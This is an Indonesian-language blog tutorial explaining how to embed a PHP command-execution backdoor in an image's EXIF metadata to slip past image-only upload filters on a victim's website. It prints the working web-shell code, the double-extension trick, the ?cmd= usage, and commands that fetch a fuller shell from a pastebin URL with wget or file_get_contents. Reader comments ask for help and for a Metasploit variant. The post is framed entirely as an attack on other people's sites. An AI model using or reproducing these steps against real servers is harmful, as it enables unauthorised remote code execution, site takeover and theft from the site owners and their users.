Cara Menyisipkan Backdoor PHP Ke Dalam Gambar - Mastah Cyber

Mastah Cyber

Tutorial, Teknologi, Android, Dan Sebagainya

Breaking

Home Top Ad

Post Top Ad

Sunday, June 10, 2018

Cara Menyisipkan Backdoor PHP Ke Dalam Gambar


Halo guys di tutorial kali ini saya akan memberi tutorial menyisipkan backdoor PHP ke dalam gambar.

Mungkin beberapa dari kalian pernah menemukan website dan saat sedang mengupload shell diharuskan image only dan tidak bisa di tamper kan. Berikut tutorial membypass nya dengan menyisipkan backdoor PHP ke dalam gambar.

Bahan - Bahan  ( Windows ):

  1.  Exif Editor ( Download Disini )
  2. Gambar yang akan  di sisipkan

Kode Backdoor PHP :

<style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="LINK GAMBAR" border=0>';}__halt_compiler();?></h1>
Tips! : LINK GAMBAR isilah dengan url gambar kalian contohnya
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="https://dummyimage.com/1280x510/000/fff.jpg" border=0>';}__halt_compiler();?></h1>

Langkah - Langkah :

  • Bukalah Exif Editor
  •  Lalu klik Open lalu pilih gambar yang ingin disisipkan Backdoor PHP.
  • Klik gambar +
Klik Yes.
  • Selanjutnya Isilah Type sesuai gambar dibawah ini dan juga isilah Value dengan sesuka hati kalian, lalu klik Add.
  •  Setelah itu klik 1 Pending Change

    • Selanjut nya klik Edit Modification
    •  Masukan lah kode PHP yang ada di atas tadi kedalam New Value lalu klik Save
    •  Lalu Klik Save 
     Pilih lah tempat penyimpanan untuk gambar yang sudah di inject tadi dan save

    • Ubahlah extensi gambar tadi menjadi 
    namagambar.jpg.php
    • Dan cobalah cek menggunakan notepad ++ apakah sudah terinject.
    Dan ternyata sudah terinject/ tersisipkan
    • Cobalah kalian upload ke website korban dan jika sudah berhasil mengupload akses lah gambar tadi dan coba masukan ?cmd= pada belakang nama gambar contohnya target.com/mastahcyber.jpg.php?cmd= lalu masukan perintah berikut uname -a contohnya ?cmd= uname -a dan jika muncul keterangan server target berarti berhasil seperti gambar dibawah ini.
    •  Selanjutnya cobalah upload shell menggunakan perintah.
    echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/en5tp4kX"));?>' > shell.php
    Bisa juga
    wget https://pastebin.com/raw/en5tp4kX -O shell.php
    Tips! : Yang saya beri warna biru kalian bisa ubah dengan shell yang kalian inginkan dan yang warna kuning itu untuk nama shell nya dan kalian juga bisa mengubahnya.
    • Cobalah akses shell yang sudah kita upload tadi sesuai nama shell dan letak dir. contohnya target.com/shell.php
     Dan shell pun terupload dan kita berhasil membypass nya  nah mudah kan.
    Sekian sampai jumpa di tutorial berikutnya dan nantikanlah tutorial menarik lainnya.

    7 comments:

    1. maksud dari "LINK GAMBAR isilah dengan url gambar kalian" tuh apa bro

      ReplyDelete
      Replies
      1. Jadi gini misal kalian punya gambar di salah satu website nah contohnya target.com/gambar.jpg nah isi dengan url gambar itu atau gambar kalian

        Delete
    2. Mohon petunjuknya mas, saya tidak bisa.
      Saya masih bingung di pengertian "Dan cobalah cek menggunakan notepad ++ apakah sudah terinject".

      Padahal semua intruksi di artikelnya sudah benar.

      ReplyDelete
      Replies
      1. Gambarnya di klik kanan - open with notepad++

        Delete
    3. persimi mas,masalah nya web nya itu cuma bisa upload .jpg bukan .php itu gimana ya..kan ini upload nya shell.jpg.php

      ReplyDelete
      Replies
      1. Coba pake tamper data gan misal shell.jpg terus pake tamper data diubah ke .php

        Delete
    4. Pagi om.. minta panduannya om.. inject backdoor metasploit ke gambar (jpg, png, ico) . Bagaimana caranya.. kalau pakai php msh ribet..

      ReplyDelete

    Post Bottom Ad

    Responsive Ads Here